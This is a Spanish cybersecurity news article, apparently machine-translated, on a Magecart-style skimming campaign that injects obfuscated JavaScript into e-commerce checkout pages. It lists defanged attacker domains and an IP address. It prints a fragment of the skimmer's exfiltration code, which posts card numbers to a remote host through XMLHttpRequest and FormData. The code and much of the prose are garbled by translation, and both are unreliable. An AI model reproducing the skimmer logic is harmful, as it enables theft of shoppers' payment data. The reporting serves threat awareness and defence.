El panorama de amenazas para los sitios web de comercio electrónico ha cambiado una vez más con el surgimiento de una sofisticada campaña de ataque al estilo de Magecart, caracterizado por el despliegue de JavaScript ofnelgado para cosechar información de pago confidencial.
La campaña salió a la luz por primera vez a mediados de septiembre de 2025 después de un tweet que indica una operación de descremado en curso, que luego fue investigada en detalle por el investigador de ciberseguridad, Himanshu Anand.
Este nuevo episodio demuestra el ingenio persistente de los grupos de descomposición web que aprovechan la inyección del lado del cliente para atacar las transacciones financieras desprevenidas a escala.
Los vectores de ataque en cuestión implican la inyección de JavaScript malicioso, alojados en dominios controlados por atacantes como CC-Analytics (.) Com, en páginas de pago vulnerables de plataformas de comercio electrónico comprometidas.
Una vez insertado, el script se combina perfectamente con flujos de trabajo de pago legítimos, enganchando los campos de formulario y los oyentes de eventos para exfiltrar los datos de pago silenciosamente.
El código inicial observado fue fuertemente ofuscado, diseñado tanto para evadir la detección por escáneres de seguridad como para frustrar el análisis por los respondedores de incidentes.
Si bien el código se ha reutilizado en varias campañas, con la lógica de malware replicada bajo diferentes nombres de dominio como GetNJS (.) Com, GetVJS (.) Com y Utilanalytics (.) Com, alojados principalmente en infraestructura como la dirección IP 45.61.136.141.
Alojamiento de IP extraída de los registros de transacciones de URLScan (Fuente – Himanshu Anand)
Investigador de ciberseguridad, Himanshu Anand, anotado La capacidad del malware para aprovechar el DNS pasivo y las huellas dactilares de infraestructura para expandir su alcance operativo.
Al analizar la telemetría pública de fuentes como URLScan y Whois Records, Anand pudo trazar una constelación de dominios relacionados vinculados a un solo grupo de infraestructura de atacantes.
Estos pivotes revelaron más de una docena de dominios activos, algunos disfrazados de análisis legítimos o servicios de servicios públicos, cada uno sirviendo cargas útiles de skimmer idénticas o casi idénticas.
El mecanismo de infección del malware
Central para el éxito de esta operación de Magecart es su mecanismo de infección: un script de skimmer altamente automatizado inyectado a través de (script src = “https://cybersecuritynews.com/new-magecart-skimmer-attack/https(:)//www(.)cc-analytics(.) componer
Una vez activo, el código establece ganchos de eventos en los campos de entrada de pago, como números de tarjeta de crédito y direcciones de facturación. Cuando se activa, el script recopila credenciales robadas y las envía rápidamente a un servidor remoto (Pstatics (.) Com) usando objetos XMLHTPRequest y FormData.
La lógica de exfiltración de datos básicas se puede describir de la siguiente manera:-
función sendStolendata (“data“` const xhr” “ “ “new xmlhttp” “ `uest (); xhr“` `post ‘,’` “ ps (:) // www.pstatics.com/i“` const form“`a = “nuevo formulario” “ “ “ `a ();; (‘uid’, “data“rdNumber”); }
El diseño asegura que solo se transmitan credenciales válidas y sin pruebas, aquellas que cumplen ciertos criterios de longitud,, maximizan la calidad y el valor de los datos robados.
Esta vía de infección se ve reforzada por la infraestructura persistente, con los atacantes que recicla los patrones de dominio con el tiempo.
¡Webinar gratuito en vivo en nuevas tácticas de malware de nuestros analistas! Aprenda técnicas de detección avanzada -> Regístrese gratis
